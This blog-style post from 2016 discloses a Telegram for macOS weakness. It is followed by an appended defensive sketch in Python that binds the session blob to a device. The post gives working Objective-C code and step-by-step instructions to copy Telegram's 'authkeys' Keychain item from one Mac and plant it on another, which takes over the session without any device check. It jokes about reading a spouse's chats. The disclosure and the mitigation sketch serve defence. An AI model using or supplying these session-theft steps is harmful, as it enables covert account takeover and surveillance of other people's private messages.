Malicious ‘shadow’ sessions in Telegram
1 min read, Aug 11, 2016
Actions on Macbook A(lice):
1) Extract Telegram data from the Keychain:
a) run ./tg_telegram_get
It writes the Telegram keychain data to the file /tmp/tgdata
OR
b) compile this Objective-C code and run it:
#import <Foundation/Foundation.h>
#import "SSKeychain.h" // third-party SSKeychain (now SAMKeychain) wrapper around Security.framework

int main(int argc, const char * argv[]) {
    // get: read the raw "authkeys" item Telegram stores under service "Telegram"
    NSData *d = [SSKeychain passwordDataForService:@"Telegram" account:@"authkeys"];
    if (d == nil) {
        return 1; // no such Keychain item (or access was denied)
    }
    [d writeToFile:@"/tmp/tgdata" atomically:YES];
    return 0;
}
You will be prompted to allow access to the Keychain, but you are NOT prompted for any password to do it. lol
2) Copy /tmp/tgdata to another device (USB?)
Actions on Macbook B(ob):
0) Copy tgdata from the USB stick to /tmp/tgdata
1) Write the Telegram data into the Keychain:
a) Just run the binary ./tg_telegram_set
b) or compile and run this:
#import <Foundation/Foundation.h>
#import "SSKeychain.h" // third-party SSKeychain (now SAMKeychain) wrapper around Security.framework

int main(int argc, const char * argv[]) {
    // set: write the copied blob back as Telegram's "authkeys" Keychain item
    NSData *fileData = [[NSFileManager defaultManager] contentsAtPath:@"/tmp/tgdata"];
    if (fileData == nil) {
        return 1; // /tmp/tgdata is missing or unreadable
    }
    [SSKeychain setPasswordData:fileData forService:@"Telegram" account:@"authkeys"];
    return 0;
}
2) Start Telegram.app
3) HOLY SHI~ Where is the device detection? Is this the most secure messenger ever made?
Is this a bug? A feature? There SHOULD be a device check on every run: the stored session data is accepted on a completely different Mac without any binding to the machine it was created on.
Up to you.
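What such a device check could look like, as an added illustration that is not Telegram's code: the stored session blob carries a MAC keyed from a device identifier, and the client refuses a blob whose MAC does not verify on the current machine. The device identifier is an assumption passed in by the caller (on macOS the IOPlatformUUID from IOKit would be the natural choice); the auth key and the two device identifiers are constructed sample values.

```python
import hashlib
import hmac
import secrets
from typing import Dict, Optional

# Constructed example of a device-bound session store. This is NOT Telegram's
# code; it only illustrates the "device check on every run" the post asks for.
# device_id is assumed to be supplied by the caller (e.g. IOPlatformUUID on macOS).

TAG_LEN = 32  # HMAC-SHA256 output length


def _binding_key(device_id: str) -> bytes:
    # Derive a per-device MAC key from the device identifier (fixed label as domain separation).
    return hashlib.sha256(b"session-binding:" + device_id.encode()).digest()


def bind_session(auth_key: bytes, device_id: str) -> bytes:
    """Return a blob that only verifies on the device identified by device_id."""
    tag = hmac.new(_binding_key(device_id), auth_key, hashlib.sha256).digest()
    return auth_key + tag


def unbind_session(blob: bytes, device_id: str) -> Optional[bytes]:
    """Return the auth key if the blob was bound to this device, otherwise None."""
    if len(blob) <= TAG_LEN:
        return None
    auth_key, tag = blob[:-TAG_LEN], blob[-TAG_LEN:]
    expected = hmac.new(_binding_key(device_id), auth_key, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        return None  # copied from another device, or tampered with
    return auth_key


def demo() -> Dict[str, bool]:
    # Constructed identifiers standing in for Alice's and Bob's platform UUIDs.
    alice, bob = "ALICE-UUID-0001", "BOB-UUID-0002"
    auth_key = secrets.token_bytes(256)        # stand-in for the stored authkeys blob
    stored = bind_session(auth_key, alice)     # what Alice's Keychain item would hold
    tampered = stored[:-1] + bytes([stored[-1] ^ 1])
    return {
        "alice_ok": unbind_session(stored, alice) == auth_key,
        "bob_rejected": unbind_session(stored, bob) is None,       # copied /tmp/tgdata refused
        "tampered_rejected": unbind_session(tampered, alice) is None,
    }
```

Because the MAC key is derived from a value the same local user can read, this only stops the copy-to-another-Mac scenario above; a key that cannot leave the device (for example one held in the Secure Enclave) or server-side review of active sessions is what actually closes the gap.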
P.S. Please, do not use it to read your wife’s chats. Just trust her :)